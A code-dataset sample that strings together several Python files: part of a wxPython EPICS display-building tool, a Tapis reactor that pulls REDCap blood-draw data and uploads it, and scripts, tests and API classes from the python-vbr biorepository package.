topPanelSizer.Add(workPanel, 1, wx.EXPAND|wx.ALL, 5)
self.mainPanel.Fit()
def addRecordName(self, event):
rName = str(event.GetString().split(".")[0])
if rName == "":
self.SetStatusText("empty record name")
return
if HAVE_CA:
pvName = rName+".RTYP"
try:
rType = caget(pvName)
except:
rType = "unknown"
else:
#print "rName=", rName
print "Pretending to do caget('%s')" % (rName+".RTYP")
rType = "unknown"
if rName in self.recordNames:
self.SetStatusText("'%s' is already in the list of records" % rName)
else:
self.recordNames.append(rName)
self.recordTypes.append(rType)
if rType in displayInfo.keys():
(prefix, name) = rName.split(':', 1)
replaceDict = makeReplaceDict(self.replaceTargets, self.replaceStrings)
prefix = dbd.doReplace(prefix+':', replaceDict)
name = dbd.doReplace(name, replaceDict)
del replaceDict
dString = displayInfo[rType][0] + ';'
dString += displayInfo[rType][1] + '=%s,' % prefix
dString += displayInfo[rType][2] + '=%s' % name
self.displayStrings.append(dString)
else:
#print "no displayInfo for record type '%s'" % rType
self.SetStatusText("no displayInfo for record type '%s'" % rType)
self.displayStrings.append("")
#print "add new record: ", rName
self.mainPanel.Destroy()
self.mainPanel = MainPanel(self)
self.fillMainPanel()
self.SendSizeEvent()
def addReplacement(self, event):
target, replacement = event.GetString().split("=")
#print "target, replacement =", target, replacement
self.replaceTargets.append(target)
self.replaceStrings.append(replacement)
#print "add new replacement: ", target, replacement
self.mainPanel.Destroy()
self.mainPanel = MainPanel(self)
self.fillMainPanel()
self.SendSizeEvent()
def openFile(self):
wildcard = "(*.dbd)|*.dbd|All files (*.*)|*.*"
dlg = wx.FileDialog(self, message="Choose a file",
defaultDir=os.getcwd(), defaultFile="", wildcard=wildcard,
style=wx.OPEN | wx.CHANGE_DIR)
path = None
ans = dlg.ShowModal()
if ans == wx.ID_OK:
path = dlg.GetPath()
dlg.Destroy()
return path
def on_openDBD_MenuSelection(self, event):
self.dbdFileName = self.openFile()
if self.dbdFileName:
self.mainPanel.Destroy()
self.dbd = dbd.readDBD(self.dbdFileName)
self.mainPanel = MainPanel(self)
self.fillMainPanel()
self.SendSizeEvent()
def on_openDB_MenuSelection(self, event):
global databasePath
wildcard = "(*.db)|*.db|All files (*.*)|*.*"
if databasePath == "":
databasePath = os.getcwd()
dlg = wx.FileDialog(self, message="Open ...",
defaultDir=databasePath, defaultFile="test.db", wildcard=wildcard,
style=wx.OPEN | wx.CHANGE_DIR)
ans = dlg.ShowModal()
if ans == wx.ID_OK:
databasePath = dlg.GetPath()
dlg.Destroy()
if ans == wx.ID_OK and databasePath:
self.SetCursor(wx.StockCursor(wx.CURSOR_WATCH))
replaceDict = makeReplaceDict(self.replaceTargets, self.replaceStrings)
(self.recordNames, self.recordTypes, self.displayStrings) = openDatabase(databasePath,
self.recordNames, self.recordTypes, self.displayStrings, replaceDict)
del replaceDict
self.SetCursor(wx.StockCursor(wx.CURSOR_DEFAULT))
#print "on_openDB_MenuSelection: recordNames = ", self.recordNames
self.mainPanel.Destroy()
self.mainPanel = MainPanel(self)
self.fillMainPanel()
self.SendSizeEvent()
def on_writeDB_MenuSelection(self, event):
global databasePath
if self.dbdFileName.find("<NOT") != -1:
self.SetStatusText("You have to open a .dbd file first")
return
if len(self.recordNames) <= 0:
self.SetStatusText("No records")
return
wildcard = "(*.db)|*.db|All files (*.*)|*.*"
if databasePath == "":
databasePath = os.getcwd()
dlg = wx.FileDialog(self, message="Save as ...",
defaultDir=databasePath, defaultFile="test.db", wildcard=wildcard,
style=wx.SAVE | wx.CHANGE_DIR)
ans = dlg.ShowModal()
if ans == wx.ID_OK:
databasePath = dlg.GetPath()
dlg.Destroy()
if ans == wx.ID_OK and databasePath:
replaceDict = makeReplaceDict(self.replaceTargets, self.replaceStrings)
self.SetCursor(wx.StockCursor(wx.CURSOR_WATCH))
writeNewDatabase(databasePath, self.recordNames, self.dbdFileName, replaceDict, self.fixUserCalcs)
del replaceDict
self.SetCursor(wx.StockCursor(wx.CURSOR_DEFAULT))
def on_writeMEDM_MenuSelection(self, event):
id = event.GetId()
global medmPath
if len(self.recordNames) <= 0:
self.SetStatusText("No records")
return
wildcard = "(*.adl)|*.adl|All files (*.*)|*.*"
if medmPath == "":
medmPath = os.getcwd()
dlg = wx.FileDialog(self, message="Save as ...",
defaultDir=medmPath, defaultFile="test.adl", wildcard=wildcard,
style=wx.SAVE | wx.CHANGE_DIR)
if dlg.ShowModal() == wx.ID_OK:
medmPath = dlg.GetPath()
dlg.Destroy()
if medmPath:
self.SetCursor(wx.StockCursor(wx.CURSOR_WATCH))
replaceDict = makeReplaceDict(self.replaceTargets, self.replaceStrings)
if id == 104:
writeNewMEDM_RDButtons(medmPath, self.recordNames, self.recordTypes, self.displayStrings, replaceDict, self.EPICS_DISPLAY_PATH)
else:
writeNewMEDM_Composites(medmPath, self.recordNames, self.recordTypes, self.displayStrings, replaceDict, self.EPICS_DISPLAY_PATH)
del replaceDict
self.SetCursor(wx.StockCursor(wx.CURSOR_DEFAULT))
def on_readDI_MenuSelection(self, event):
global displayInfo
wildcard = "(*.txt)|*.txt|All files (*.*)|*.*"
diPath = os.getcwd()
dlg = wx.FileDialog(self, message="Open ...",
defaultDir=diPath, defaultFile="displayInfo.txt", wildcard=wildcard, style=wx.OPEN)
ans = dlg.ShowModal()
if ans == wx.ID_OK:
diPath = dlg.GetPath()
dlg.Destroy()
if ans == wx.ID_OK and diPath:
self.mainPanel.Destroy()
self.displayInfoFileName = diPath
displayInfo = readDisplayInfoFile(diPath)
self.mainPanel = MainPanel(self)
self.fillMainPanel()
self.SendSizeEvent()
def main():
app = wx.PySimpleApp()
frame = TopFrame(None, -1, 'dbd', size=(800,400))
#frame = TopFrame(None, -1, 'dbd')
frame.Center()
(hS, vS) = frame.GetSize()
(hP, vP) = frame.GetPosition()
frame.width = (hP + hS/2)*2
frame.height = (vP + vS/2)*2
frame.SetMaxSize((frame.width, frame.height))
frame.Show(True)
app.MainLoop()
if __name__ == "__main__":
main()
``` |
{
"source": "a2cps/blood-api-manager",
"score": 2
} |
#### File: a2cps/blood-api-manager/reactor.py
```python
from reactors.runtime import Reactor
import datetime
import simplejson as json
import os
import requests
import shutil
import time
def slack_notify(message, reactor):
if reactor.settings.get('workflow', {}).get('notify', True):
try:
reactor.client.actors.sendMessage(
actorId=reactor.settings.links.slackbot,
body={
'message': '{0}: {1}'.format(reactor.actor_name, message)
})
except Exception as exc:
reactor.logger.warn(
'Failed to send Slack notification from {0}: {0}'.format(
exc, reactor.actor_name))
else:
reactor.logger.info(
'Skipped sending Slack notification from {0}'.format(
reactor.actor_name))
def main():
r = Reactor(tapis_optional=True)
# Generate timestamp
timestamp = time.strftime("%Y%m%dT%H%M%SZ", time.gmtime())
for mcc in r.settings.mccs:
save_api(mcc, timestamp, r)
def redact_data(json_data: dict):
"""Placeholder for deny-list redaction
"""
return json_data
def save_api(mcc: int, timestamp: str, r: object):
timestamp_filename = os.path.join(
os.getcwd(), '{0}-{1}-{2}.json'.format(r.settings.tapis.filename, mcc,
timestamp))
latest_filename = os.path.join(
os.getcwd(), '{0}-{1}-{2}.json'.format(r.settings.tapis.filename, mcc,
'latest'))
files_to_upload = [timestamp_filename, latest_filename]
try:
r.logger.debug('Retrieving MCC {0} data from RedCAP'.format(mcc))
tok = os.environ.get('REDCAP_TOKEN',
'<KEY>')
headers = {'Token': tok}
data = {'op': 'blood', 'mcc': mcc}
resp = requests.post(r.settings.redcap.custom_api,
headers=headers,
data=data)
resp.raise_for_status()
data = resp.json()
r.logger.debug('RedCAP data retrieved.')
except Exception as exc:
slack_notify('Data retrieval from RedCAP failed: {0}'.format(exc), r)
r.on_failure(exc)
# Redact sensitive fields from API response
data = redact_data(data)
# Dump JSON data to timestamped file
with open(timestamp_filename, 'w') as jf:
json.dump(data, jf, separators=(',', ':'))
# Make a copy as 'latest'
shutil.copy2(timestamp_filename, latest_filename)
# Upload files via Tapis files
if r.settings.get('workflow', {}).get('upload', True):
r.logger.debug('Uploading files... ' + str(files_to_upload))
try:
for fn in files_to_upload:
r.logger.info('File {0}'.format(fn))
r.client.files.importData(
systemId=r.settings.tapis.storage_system,
filePath=r.settings.tapis.path,
fileToUpload=open(fn, 'rb'))
# Grant permission
r.logger.info('Setting ACL')
body = {
'username': r.settings.tapis.username,
'permission': r.settings.tapis.pem
}
report_path = os.path.join(r.settings.tapis.path,
os.path.basename(fn))
r.client.files.updatePermissions(
systemId=r.settings.tapis.storage_system,
filePath=report_path,
body=body)
except Exception as exc:
slack_notify('File uploads failed: {0}'.format(exc), r)
r.on_failure(exc)
else:
r.logger.info('Skipping uploads')
slack_notify(
'Blood Draw API data for MCC {0} was processed'.format(mcc), r)
if __name__ == '__main__':
main()
``` |
{
"source": "a2cps/python-vbr",
"score": 2
} |
#### File: scripts/data/__init__.py
```python
import glob
import inspect
import os
from vbr.pgrest import table
from vbr.tableclasses import class_from_table
from .anatomy import AnatomyData
from .assay_type import AssayTypeData
from .biosample import BiosampleData
from .contact import ContactData
# from .box_type import BoxTypeData
from .container import ContainerData
from .container_type import ContainerTypeData
from .data_event import DataEventData
from .data_type import DataTypeData
from .dataset import DatasetData
from .file import FileData
from .file_format import FileFormatData
from .loader import TableData
from .location import LocationData
from .measurement_type import MeasurementTypeData
from .organization import OrganizationData
from .project import ProjectData
from .project_in_project import ProjectInProjectData
from .protocol import ProtocolData
from .reason import ReasonData
from .role import RoleData
from .status import StatusData
from .subject import SubjectData
from .unit import UnitData
# __all__ = ['data_loads']
def _classes():
"""Private: Return the list of table data classes via Python inspection"""
import inspect
import sys
classlist = []
for _, obj in inspect.getmembers(sys.modules[__name__]):
if inspect.isclass(obj):
if TableData in obj.__bases__:
# Filter out the spurious table named association_table that
# we get from importing AssociationTable
if obj.__name__ not in ("TableData"):
classlist.append(obj)
return tuple(classlist)
def class_from_name(table_name: str) -> TableData:
"""Return table data class by table class name"""
for c in _classes():
try:
if c.__name__ == table_name:
return c
except Exception:
pass
def data_classes(table_definitions: list) -> list:
ordered = []
for t in table_definitions:
tdef_name = t["table_name"]
tdef_classname = class_from_table(t["table_name"]).__name__
cl = class_from_name(tdef_classname + "Data")
if cl is not None:
ordered.append(cl)
return ordered
def data_loads(table_definition: list) -> list:
"""Return dependency-ordered list of data objects to load"""
ordered = []
oc = data_classes(table_definition)
for c in oc:
for rec in c().records:
ordered.append(rec)
return ordered
def redcap_data_dictionaries() -> list:
"""Return paths to REDcap *DataDictionary* files from 'data' directory"""
base = os.path.dirname(__file__)
return glob.glob(os.path.join(base, "*DataDictionary*"), recursive=False)
```
#### File: src/scripts/dump_tables.py
```python
def main(args):
t = Tapis(
base_url=args["base_url"], username=args["username"], password=args["password"]
)
t.get_tokens()
v = VBR(tapis_client=t)
if len(args["table_name"]) > 0:
to_export = args["table_name"]
else:
to_export = [t["table_name"] for t in v.list_tables()]
dumps_dir = args.get("dumps_dir", None)
if dumps_dir is None:
# target is "exports" directory at top level of python-vbr
dumps_dir = exports_directory()
for t in to_export:
print("Exporting {0}".format(t))
filename = os.path.join(dumps_dir, ".".join([t, "csv"]))
data = [r.dict() for r in v.list_rows(root_url=t, limit=100000)]
if len(data) > 0:
keys = data[0].keys()
with open(filename, "w", newline="") as output_file:
dict_writer = csv.DictWriter(output_file, keys)
dict_writer.writeheader()
dict_writer.writerows(data)
if __name__ == "__main__":
import csv
import os
from tapipy.tapis import Tapis
from vbr import tableclasses
from vbr.client import VBR
from .cli import exports_directory, get_parser
from .data import data_loads
parser = get_parser()
parser.add_argument(
"-O", "--dumps-dir", dest="dumps_dir", help="Dumps directory [exports]"
)
parser.add_argument("table_name", nargs="*", help="Optional: Table Name(s)")
args = parser.parse_args()
main(vars(args))
```
#### File: src/scripts/redcap_classfiles.py
```python
def choices_to_dict(choices_str: str) -> dict:
# REDcap choices are expressed as pipe-delimited sets of comma-delim values
#
# Used to populate dropdown, checkbox, or slider types
#
# Example: 1, Yes | 0, No
# Example: 0, 0 | .25, 0.25 | .5, 0.5 | 1, 1 | 2, 2 | 4, 4 | 8, 8
# Example: 1, Unable to obtain blood sample -technical reason | 2, Unable to obtain blood sample -patient related | 3, Sample handling/processing error
cdict = {}
for i in choices_str.split("|"):
i = i.strip()
ii = i.split(",")
if len(ii) > 1:
k = ii[0].strip()
v = ii[1].strip()
cdict[k] = v
return cdict
def choices_are_integer(choices_str: str) -> bool:
cdict = choices_to_dict(choices_str)
for k, _ in cdict.items():
try:
res = int(k)
except ValueError:
return False
return True
def choices_are_numeric(choices_str: str) -> bool:
cdict = choices_to_dict(choices_str)
for k, _ in cdict.items():
try:
res = float(k)
except ValueError:
return False
return True
def choices_are_boolean(choices_str: str) -> bool:
cdict = choices_to_dict(choices_str)
values = []
for k, _ in cdict.items():
try:
res = int(k)
values.append(res)
except ValueError:
return False
if len(values) > 2 or len(values) < 1:
return False
for v in values:
if v not in [0, 1]:
return False
return True
def choices_are_yesno(choices_str: str) -> bool:
cdict = choices_to_dict(choices_str)
values = []
for k, _ in cdict.items():
values.append(k)
if len(values) != 2:
return False
for v in values:
if v not in ["Y", "N"]:
return False
return True
def process_data_dict(filename: str, current: dict = None) -> dict:
"""Convert a REDcap Data Dictionary into a minimally processed, actionable Python dict"""
# {form_name: { field_name: {}}}
if current is None:
ddict = {}
else:
ddict = current
with open(filename, "r") as csvfile:
ddreader = csv.reader(csvfile)
# Strip header
headers = next(ddreader, None)
for row in ddreader:
# Form Name
form_name = row[1]
# Variable / Field Name
var_field_name = row[0]
# Field Type
field_type = row[3]
# Field Label
field_label = row[4]
# Choices
choices = row[5]
# Identifier
identifier = row[10]
if identifier == "y":
identifier = True
else:
identifier = False
if form_name != "" and var_field_name != "":
if (
field_type in SUPPORTED_STRING_TYPES
or field_type in SUPPORTED_FREETEXT_TYPES
):
# print('{0}.{1}'.format(form_name, var_field_name))
ddict_entry = {
"field_type": field_type,
"field_label": field_label,
"choices": choices,
"identifier": identifier,
"source": os.path.basename(filename),
}
if form_name not in ddict:
ddict[form_name] = {}
ddict[form_name][var_field_name] = ddict_entry
return ddict
def build(args):
logging.info("Building REDcap tableclass files...")
DEST_DIR = os.path.join(os.path.dirname(redcap.__file__), "autogenerated")
TEMPLATES_DIR = os.path.join(os.path.dirname(__file__), "templates")
# Ensure class files destination exists
Path(DEST_DIR).mkdir(parents=True, exist_ok=True)
ddict = {}
for dd in redcap_data_dictionaries():
ddict = process_data_dict(filename=dd, current=ddict)
init_dict = {}
for form_name, form_config in ddict.items():
# Set up class def skeleton
submodule_name = form_name
# acute_phase_trajectory_items_v01_6month_daily => RcapAcutePhaseTrajectoryItemsV016MonthDaily
class_name = "Rcap" + snake_to_camel_case(form_name)
# acute_phase_trajectory_items_v01_6month_daily => Acute Phase Trajectory Items V01 6Month Daily
class_docstring = snake_to_title_string(form_name)
autogen_string = "Autogenerated {0} by {1}".format(
datetime.today().isoformat(), os.path.basename(__file__)
)
keyvals = {
"redcap_form_name": form_name,
"class_name": class_name,
"docstring": class_docstring,
"module_docstring": autogen_string,
"parent_class_name": "RcapTable",
}
# Extend class def with column entries
keyvals["columns"] = {}
for col_name, col_config in form_config.items():
if col_config.get("field_type", None) in SUPPORTED_STRING_TYPES:
col_type = "String"
elif col_config.get("field_type", None) in SUPPORTED_FREETEXT_TYPES:
col_type = "FreeText"
#####################
# Translation rules #
#####################
# Columns are always nullable (at least
# until we decide what columns are mandatory)
col_nullable = "True"
# Empty default comment
col_comments = []
# Type shifts
if col_name == "guid":
col_type = "GUID"
if col_config.get("field_type", None) == "yesno":
col_type = "Boolean"
# Process 'Choices' field
col_choices = col_config.get("choices", "")
# Try to override type to be more descriptive of field value
# based on choices available in REDcap form
if col_choices != "":
# TODO Implement casting/handling of string, numeric values to 1/0
if choices_are_boolean(col_choices) or choices_are_yesno(col_choices):
col_type = "Boolean"
elif choices_are_integer(col_choices):
col_type = "Integer"
elif choices_are_numeric(col_choices):
col_type = "Numeric"
# Property source code comments
col_label = col_config.get("field_label", "")
# Handle empty field name
if col_label == "":
col_label = "Field Name was empty in Data Dictionary"
# Ignore multiline field names
if len(col_label.splitlines()) > 1:
col_label = "Ignored multiline Field Name in Data Dictionary"
# Strip leading numeric
col_label = re.sub("^[0-9]+\.", "", col_label)
# Strip leading/trailing whitespace
col_label = col_label.strip()
# Strip HTML tags
if col_label.startswith("<"):
# col_label = 'Ignored HTML Field Name'
col_label = re.sub("<[^<]+?>", "", col_label)
# Strip trailing : character
if col_label.endswith(":"):
col_label = re.sub(":$", "", col_label)
# Truncate label to 64 chars
if len(col_label) > 64:
col_label = col_label[:61] + "..."
# Strip trailing whitespace
col_label = col_label.rstrip("\n")
# Comments list is turned into source code comments in classfile
col_comments.append(col_label)
col_comments.append("Field Type: {0}".format(col_config.get("field_type")))
if len(col_choices) <= 1:
col_choices = "N/A"
col_comments.append("Choices: {0}".format(col_choices))
# Template rendering data
keyvals["columns"][col_name] = {
"comments": col_comments,
"docstring": col_label,
"nullable": col_nullable,
"type": col_type,
}
# Render and write the class file from Jinja template
with open(os.path.join(TEMPLATES_DIR, CLASS_TEMPLATE)) as tf:
template = Template(tf.read())
output = template.render(**keyvals)
with open(os.path.join(DEST_DIR, submodule_name + ".py"), "w") as cf:
cf.write(output)
cf.close()
# Supports writing 'from <submodule> import <classname> in __init__.py
init_dict[submodule_name] = class_name
# Render and write the class file from Jinja template
with open(os.path.join(TEMPLATES_DIR, INIT_TEMPLATE)) as tf:
template = Template(tf.read())
imports = {"imports": init_dict}
output = template.render(imports)
with open(os.path.join(DEST_DIR, "__init__.py"), "w") as cf:
cf.write(output)
cf.close()
logging.info("Done")
def clean(args):
logging.info("Cleaning REDcap tableclass files...")
DEST_DIR = os.path.join(os.path.dirname(redcap.__file__), "autogenerated")
TEMPLATES_DIR = os.path.join(os.path.dirname(__file__), "templates")
# Ensure class files destination exists
Path(DEST_DIR).mkdir(parents=True, exist_ok=True)
# Delete any *.py files in DEST_DIR
for pyfile in glob.glob(DEST_DIR + "/*.py"):
os.unlink(pyfile)
# Write empty __init__.py
with open(os.path.join(TEMPLATES_DIR, INIT_TEMPLATE)) as tf:
template = Template(tf.read())
imports = {
"module_docstring": "Intentionally empty as class files have not been generated",
"imports": {},
}
output = template.render(imports)
with open(os.path.join(DEST_DIR, "__init__.py"), "w") as cf:
cf.write(output)
cf.close()
logging.info("Done")
def main(args):
if args["cmd"] == "build":
build(args)
elif args["cmd"] == "clean":
clean(args)
if __name__ == "__main__":
import argparse
import collections
import csv
import glob
import logging
import os
import re
from datetime import datetime
from pathlib import Path
import simplejson as json
from jinja2 import Template
from vbr.pgrest.utils import snake_to_camel_case, snake_to_title_string
from vbr.tableclasses import redcap
from .cli import get_parser
from .data import redcap_data_dictionaries
CLASS_TEMPLATE = "redcap_tableclass.py.j2"
INIT_TEMPLATE = "redcap_tableclasses_init.py.j2"
SUPPORTED_STRING_TYPES = ["text", "radio", "dropdown", "checkbox", "yesno"]
SUPPORTED_FREETEXT_TYPES = ["notes"]
parser = get_parser()
parser.add_argument(
"cmd", nargs="?", choices=["build", "clean"], default="build", help="Command"
)
args = parser.parse_args()
main(vars(args))
```
#### File: src/tests/test_700_utils_helpers_redcaptasks.py
```python
import pytest
import vbr
def test_redcap_event_to_vbr_protocol():
assert (
vbr.utils.redcaptasks.redcap_event_to_vbr_protocol("informed_consent_arm_1")
== 2
)
def test_redcap_event_to_vbr_protocol_valuerror():
with pytest.raises(ValueError):
vbr.utils.redcaptasks.redcap_event_to_vbr_protocol("deadbeef")
def test_redcap_event_id_to_unique_event_name():
assert (
vbr.utils.redcaptasks.redcap_event_id_to_unique_event_name(41)
== "informed_consent_arm_1"
)
def test_redcap_event_id_to_unique_event_name_valuerror():
with pytest.raises(ValueError):
vbr.utils.redcaptasks.redcap_event_id_to_unique_event_name(-1)
@pytest.mark.parametrize("test_input,expected", [("14", "2"), ("29", "3"), ("25", "1")])
def test_redcap_project_id_to_vbr_project(test_input, expected):
assert vbr.utils.redcaptasks.redcap_to_vbr_project_id(test_input) == expected
@pytest.mark.parametrize(
"test_input,expected",
[
("2001-04-12 19:03", "2001-04-13T01:03:00.000000Z"),
("2001-04-12 19:03:24", "2001-04-13T01:03:24.000000Z"),
("2001-04-12 19:03:24.000001", "2001-04-13T01:03:24.000001Z"),
("2001-04-12", None),
("2001-04-12T19:03:24", "2001-04-13T01:03:24.000000Z"),
],
)
def test_redcap_to_pgrest_datetime(test_input, expected):
if expected is None:
with pytest.raises(ValueError):
vbr.utils.redcaptasks.redcap_to_pgrest_datetime(test_input)
else:
assert vbr.utils.redcaptasks.redcap_to_pgrest_datetime(test_input) == expected
@pytest.mark.parametrize("test_input,expected", [("1", "11"), (1, "11"), ("100", "0")])
def test_redcap_shipping_mcc_to_vbr_location(test_input, expected):
assert (
vbr.utils.redcaptasks.redcap_shipping_mcc_to_vbr_location(test_input)
== expected
)
@pytest.mark.parametrize(
"test_input,expected", [("1", "2"), (1, "2"), ("4", "3"), (100, "0")]
)
def test_redcap_shipping_mcc_to_vbr_project(test_input, expected):
assert (
vbr.utils.redcaptasks.redcap_shipping_mcc_to_vbr_project(test_input) == expected
)
@pytest.mark.parametrize(
"test_input,expected", [("rush_university_me", "11"), ("torchys_tacos", "0")]
)
def test_redcap_data_access_group_to_vbr_location(test_input, expected):
assert (
vbr.utils.redcaptasks.redcap_data_access_group_to_vbr_location(test_input)
== expected
)
```
#### File: vbr/api/container.py
```python
from vbr.tableclasses import Container
__all__ = ["ContainerApi"]
class ContainerApi(object):
def get_container(self, pkid: str) -> Container:
"""Retrieve a Container by primary identifier."""
return self._get_row_from_table_with_id("container", pkid)
def get_container_by_local_id(self, local_id: str) -> Container:
"""Retrieve a Container by local_id."""
return self._get_row_from_table_with_local_id("container", local_id)
def get_container_by_tracking_id(self, tracking_id: str) -> Container:
"""Retrieve a Container by tracking_id."""
return self._get_row_from_table_with_tracking_id("container", tracking_id)
def create_container(
self,
tracking_id: str,
project_id: int,
container_type_id: int,
location_id: int = 1,
status_id: int = 10, # Created
parent_id: int = 0, # Root container
) -> Container:
"""Create a new Container."""
container_type_id = str(container_type_id)
location_id = str(location_id)
ct = Container(
tracking_id=tracking_id,
container_type=container_type_id,
location=location_id,
status=status_id,
)
try:
return self.vbr_client.create_row(ct)[0]
except Exception:
raise
def create_or_get_container_by_tracking_id(
self,
tracking_id: str,
project_id: int,
container_type_id: int,
location_id: int = 1,
status_id: int = 10, # Created
parent_id: int = 0, # Root container
) -> Container:
"""Create a Container or return existing with specified tracking_id."""
try:
return self.create_container(
tracking_id,
project_id,
container_type_id,
location_id,
status_id,
parent_id,
)
except Exception:
return self.get_container_by_tracking_id(tracking_id)
```
#### File: vbr/api/manage_status.py
```python
from vbr.tableclasses import (
Container,
Measurement,
Shipment,
Status,
Table,
SysEvent,
)
from .data_event import DataEventApi
from .status import StatusApi
__all__ = ["ManageStatusApi"]
class ManageStatusApi(object):
def _status_from_status_name(self, status_name: str, table_name: str) -> Status:
"""Returns a Status for a valid status and table name."""
status_name = status_name.lower()
status_prefix = table_name + "."
if not status_name.startswith(status_prefix):
status_name = status_prefix + status_name
try:
return StatusApi.get_status_by_name(self, status_name)
except ValueError:
raise ValueError("Unrecognized %s status %s", table_name, status_name)
def _update_row_status(
self, vbr_row: Table, status: Status, comment: str = None
) -> Table:
"""Update a VBR row with the provided Status"""
if getattr(vbr_row, "status", None) is None:
raise ValueError(
"Cannot update status of <%s> object", vbr_row.__schema__.table_name
)
new_status_id = status.status_id
ori_status_id = vbr_row.status
if new_status_id != ori_status_id:
vbr_row.status = new_status_id
vbr_row = self.vbr_client.update_row(vbr_row)
DataEventApi.create_and_link(
self,
status_id=new_status_id,
comment=comment,
link_target=vbr_row,
)
return vbr_row
def update_container_status_by_name(
self, container: Container, status_name: str, comment: str = None
) -> Container:
"""Update Container status by status.name"""
new_status = self._status_from_status_name(status_name, "container")
return self._update_row_status(container, new_status, comment)
def update_measurement_status_by_name(
self, measurement: Measurement, status_name: str, comment: str = None
) -> Measurement:
"""Update Measurement status by status.name"""
new_status = self._status_from_status_name(status_name, "measurement")
return self._update_row_status(measurement, new_status, comment)
def update_shipment_status_by_name(
self, shipment: Shipment, status_name: str, comment: str = None
) -> Shipment:
"""Update Shipment status by status.name"""
new_status = self._status_from_status_name(status_name, "shipment")
return self._update_row_status(shipment, new_status, comment)
def update_sysevent_status_by_name(
self, sys_event: SysEvent, status_name: str, comment: str = None
) -> SysEvent:
"""Update SysEvent status by status.name"""
new_status = self._status_from_status_name(status_name, "sysevent")
return self._update_row_status(sys_event, new_status, comment)
def _get_vbr_row_status(self, vbr_row: Table) -> Status:
"""Get Status for the provided VBR row."""
if getattr(vbr_row, "status", None) is None:
raise ValueError(
"Cannot get status of <%s> object", vbr_row.__schema__.table_name
)
return StatusApi.get_status(self, vbr_row.status)
def get_container_status(self, container: Container) -> Status:
"""Get current Status for a Container."""
return self._get_vbr_row_status(container)
def get_measurement_status(self, measurement: Measurement) -> Status:
"""Get current Status for a Measurement."""
return self._get_vbr_row_status(measurement)
def get_shipment_status(self, shipment: Shipment) -> Status:
"""Get current Status for a Shipment."""
return self._get_vbr_row_status(shipment)
def get_sysevent_status(self, sys_event: SysEvent) -> Status:
"""Get current Status for a SysEvent."""
return self._get_vbr_row_status(sys_event)
```
#### File: vbr/api/measurement.py
```python
from typing import List
from vbr.pgrest.time import timestamp
from vbr.tableclasses import Biosample, Container, Measurement
from vbr.utils import utc_time_in_seconds
from .data_event import DataEventApi
__all__ = ["MeasurementApi"]
class MeasurementApi(object):
def get_measurement(self, pkid: str) -> Measurement:
"""Retrieve a Measurement by primary identifier."""
return self._get_row_from_table_with_id("measurement", pkid)
def get_measurement_by_local_id(self, local_id: str) -> Measurement:
"""Retrieve a Measurement by local_id."""
return self._get_row_from_table_with_local_id("measurement", local_id)
def get_measurement_by_tracking_id(self, tracking_id: str) -> Measurement:
"""Retrieve a Measurement by tracking_id."""
return self._get_row_from_table_with_tracking_id("measurement", tracking_id)
def create_measurement(
self,
tracking_id: str,
biosample_id: int,
project_id: int,
measurement_type_id: int,
unit_id: int,
container_id: int,
status_id: int,
creation_timestr: str = None,
) -> Measurement:
"""Create a new Measurement."""
# TODO - data_event
bs = Measurement(
tracking_id=tracking_id,
biosample=biosample_id,
project=project_id,
measurement_type=measurement_type_id,
unit=unit_id,
container=container_id,
status=status_id,
creation_time=creation_timestr,
)
try:
return self.vbr_client.create_row(bs)[0]
except Exception:
raise
def create_or_get_measurement_by_tracking_id(
self,
tracking_id: str,
biosample_id: int,
project_id: int,
measurement_type_id: int,
unit_id: int,
container_id: int,
status_id: int,
creation_timestr: str = None,
) -> Measurement:
"""Create a Measurement or return existing with specified tracking_id."""
try:
return self.create_measurement(
tracking_id,
biosample_id,
project_id,
measurement_type_id,
unit_id,
container_id,
status_id,
creation_timestr,
)
except Exception:
return self.get_measurement_by_tracking_id(tracking_id)
def partition_measurement(
self, measurement: Measurement, tracking_id: str = None, comment: str = None
) -> Measurement:
"""Create a sub-Measuremenent from a Measurement."""
# 1. Clone the original Measurement to a new Measurement,
m2 = measurement.clone()
m2.measurement_id = None
m2.local_id = None
m2.creation_time = timestamp()
# Append timestamp to extant tracking_id if one not provided
if tracking_id is not None:
m2.tracking_id = tracking_id
else:
m2.tracking_id = measurement.tracking_id + "." + utc_time_in_seconds()
m2 = self.vbr_client.create_row(m2)[0]
# TODO Register the relation via MeasurementFromMeasurement table
DataEventApi.create_and_link(
self,
comment="Partitioned to {0}".format(m2.local_id),
link_target=measurement,
)
return m2
def get_measurement_partitions(self, measurement: Measurement) -> List[Measurement]:
"""Retrieve Measurements partioned from a Measurment."""
# Query MeasurementFromMeasurement table
raise NotImplemented()
def get_measurements_in_container(self, container: Container) -> List[Measurement]:
"""Retrieve Measurements in a Container."""
query = {"container": {"operator": "=", "value": container.container_id}}
return self.vbr_client.query_rows(
root_url="measurement", query=query, limit=1000000
)
def get_measurements_in_biosample(self, biosample: Biosample) -> List[Measurement]:
"""Retrieve Measurements in a Biosample."""
query = {"biosample": {"operator": "=", "value": biosample.biosample_id}}
return self.vbr_client.query_rows(
root_url="measurement", query=query, limit=1000000
)
```
#### File: vbr/api/organization.py
```python
from vbr.tableclasses import Organization
__all__ = ["OrganizationApi"]
class OrganizationApi(object):
def get_organization(self, pkid: str) -> Organization:
"""Retrieve a Organization by primary identifier."""
return self._get_row_from_table_with_id("organization", pkid)
def get_organization_by_name(self, name: str) -> Organization:
"""Retrieve a Organization by name."""
query = {"name": {"operator": "=", "value": name}}
return self._get_row_from_table_with_query("organization", query)
```
#### File: vbr/api/utils.py
```python
import uuid
__all__ = ["generate_guid"]
def generate_guid() -> str:
"""Generate a GUID."""
return str(uuid.uuid4()).upper()
```
#### File: vbr/client/connection.py
```python
import logging
import os
import uuid
from typing import Any, NoReturn
import requests
from tapipy.tapis import Tapis, TapisResult
logging.basicConfig(level=logging.CRITICAL)
__all__ = ["Connection", "TapisUserEnv", "TapisDirectClient"]
class Connection(object):
"""Provides a PgREST client"""
def __init__(self, tapis_client: Tapis, session=None, auto_connect=True):
if session is None:
self.session = uuid.uuid4().hex
else:
self.session = str(session)
logging.debug("VBR Session: " + self.session)
self.client = tapis_client
if auto_connect:
self.connect()
def connect(self, tapis_client: Tapis = None) -> NoReturn:
if tapis_client is not None:
self.client = tapis_client
# try:
# self.client.get_tokens()
# except Exception:
# # Probably running inside an Actor where this won't work
# pass
class TapisUserEnv(Tapis):
"""Supports initialization of a Tapis user client from env vars"""
def __init__(self, **kwargs):
super().__init__(
base_url=os.environ["VBR_HOST"],
username=os.environ["VBR_USERNAME"],
password=os.environ["VBR_PASSWORD"],
**kwargs
)
class TapisDirectClient(object):
